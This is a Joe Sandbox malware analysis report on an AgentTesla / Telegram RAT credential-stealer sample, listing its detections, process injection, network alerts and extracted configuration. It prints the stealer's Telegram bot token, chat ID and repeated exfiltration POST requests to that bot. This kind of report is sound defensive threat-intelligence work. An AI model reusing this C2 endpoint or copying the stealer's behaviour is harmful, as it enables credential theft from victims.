Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe
Analysis ID:1545509
MD5:34f978912d45ce5df9309990ecfb0232
SHA1:05505050b157f8fe6da04a06484835f75c8f0bdc
SHA256:89456271970de32ecdfadbfada5c9ef76d75cc3b2fd7bf0b36c1cf14167117fd
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe" MD5: 34F978912D45CE5DF9309990ECFB0232)
    • cvtres.exe (PID: 4900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CvtRes.exe" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • cvtres.exe (PID: 1344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CvtRes.exe" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendMessage?chat_id=7102900518"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.4151053651.00000000030D8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.4151053651.00000000030D8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 9 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x31696:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x31708:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x31792:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x31824:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x3188e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x31900:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x31996:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x31a26:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    2.2.cvtres.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 7 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-30T16:23:07.471899+010028517791Malware Command and Control Activity Detected192.168.2.449737149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-30T16:23:07.471899+010028528151Malware Command and Control Activity Detected192.168.2.449737149.154.167.220443TCP
                      2024-10-30T16:24:40.569660+010028528151Malware Command and Control Activity Detected192.168.2.449958149.154.167.220443TCP
                      2024-10-30T16:24:56.090448+010028528151Malware Command and Control Activity Detected192.168.2.450006149.154.167.220443TCP
                      2024-10-30T16:25:11.087794+010028528151Malware Command and Control Activity Detected192.168.2.450007149.154.167.220443TCP
                      2024-10-30T16:25:13.983975+010028528151Malware Command and Control Activity Detected192.168.2.450008149.154.167.220443TCP
                      2024-10-30T16:25:22.964661+010028528151Malware Command and Control Activity Detected192.168.2.450010149.154.167.220443TCP
                      2024-10-30T16:25:23.176038+010028528151Malware Command and Control Activity Detected192.168.2.450011149.154.167.220443TCP
                      2024-10-30T16:25:38.033265+010028528151Malware Command and Control Activity Detected192.168.2.450013149.154.167.220443TCP
                      2024-10-30T16:25:38.096839+010028528151Malware Command and Control Activity Detected192.168.2.450014149.154.167.220443TCP
                      2024-10-30T16:25:43.761955+010028528151Malware Command and Control Activity Detected192.168.2.450015149.154.167.220443TCP
                      2024-10-30T16:25:45.656405+010028528151Malware Command and Control Activity Detected192.168.2.450016149.154.167.220443TCP
                      2024-10-30T16:25:52.335815+010028528151Malware Command and Control Activity Detected192.168.2.450017149.154.167.220443TCP
                      2024-10-30T16:25:55.536826+010028528151Malware Command and Control Activity Detected192.168.2.450018149.154.167.220443TCP
                      2024-10-30T16:26:03.795139+010028528151Malware Command and Control Activity Detected192.168.2.450019149.154.167.220443TCP
                      2024-10-30T16:26:25.527591+010028528151Malware Command and Control Activity Detected192.168.2.450020149.154.167.220443TCP
                      2024-10-30T16:26:40.854623+010028528151Malware Command and Control Activity Detected192.168.2.450021149.154.167.220443TCP
                      2024-10-30T16:26:59.947693+010028528151Malware Command and Control Activity Detected192.168.2.450022149.154.167.220443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeAvira: detected
                      Found malware configuration
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendMessage?chat_id=7102900518"}
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.1900.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendMessage"}
                      Multi AV Scanner detection for submitted file
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeReversingLabs: Detection: 52%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeJoe Sandbox ML: detected
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49958 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50006 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50007 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50008 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50009 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50010 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50011 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50012 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50013 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50014 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50015 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50016 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50017 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50018 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50019 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50020 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50021 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50022 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50023 version: TLS 1.2
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: RIDE.pdb source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702725680.0000000002561000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702461925.0000000000B00000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: RIDE.pdb( source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702725680.0000000002561000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702461925.0000000000B00000.00000004.08000000.00040000.00000000.sdmp

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49737 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49737 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49958 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50008 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50016 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50017 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50014 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50020 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50022 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50021 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50011 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50015 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50013 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50018 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50007 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50006 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50010 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:50019 -> 149.154.167.220:443
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf8d5391f55d9Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd05b668e43bb1Host: api.telegram.orgContent-Length: 76457Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd104dbc64a525Host: api.telegram.orgContent-Length: 76457Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd17130ddb0f75Host: api.telegram.orgContent-Length: 76460Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd19dfeeb9adbaHost: api.telegram.orgContent-Length: 76460Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd205e132b7c54Host: api.telegram.orgContent-Length: 76509Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2220eb6172f8Host: api.telegram.orgContent-Length: 76837Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd2e705f847556Host: api.telegram.orgContent-Length: 76460Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd302aba920484Host: api.telegram.orgContent-Length: 76460Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd359e03a55a94Host: api.telegram.orgContent-Length: 81440Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3801e7ebb72fHost: api.telegram.orgContent-Length: 76460Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3c0ce1646b7bHost: api.telegram.orgContent-Length: 76460Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd3edf620398cbHost: api.telegram.orgContent-Length: 76460Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd436c6ca63fd7Host: api.telegram.orgContent-Length: 76478Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd4c81660ee58dHost: api.telegram.orgContent-Length: 76478Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd53711b0bb0b7Host: api.telegram.orgContent-Length: 76478Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd5ba41d84a6e0Host: api.telegram.orgContent-Length: 76478Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf8d5c9f72391Host: api.telegram.orgContent-Length: 76466Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcf8d5391f55d9Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
                      Source: cvtres.exe, 00000002.00000002.4151053651.0000000003557000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.000000000359D000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.000000000343E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: cvtres.exe, 00000002.00000002.4151053651.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.0000000003091000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: cvtres.exe, 00000002.00000002.4151053651.000000000359D000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000034FC000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.000000000343E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                      Source: cvtres.exe, 00000002.00000002.4151053651.000000000314F000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.0000000003168000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.000000000343E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.0000000003091000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/
                      Source: cvtres.exe, 00000002.00000002.4151053651.000000000314F000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.000000000359D000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.0000000003168000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.00000000034FC000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000002.00000002.4151053651.000000000343E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
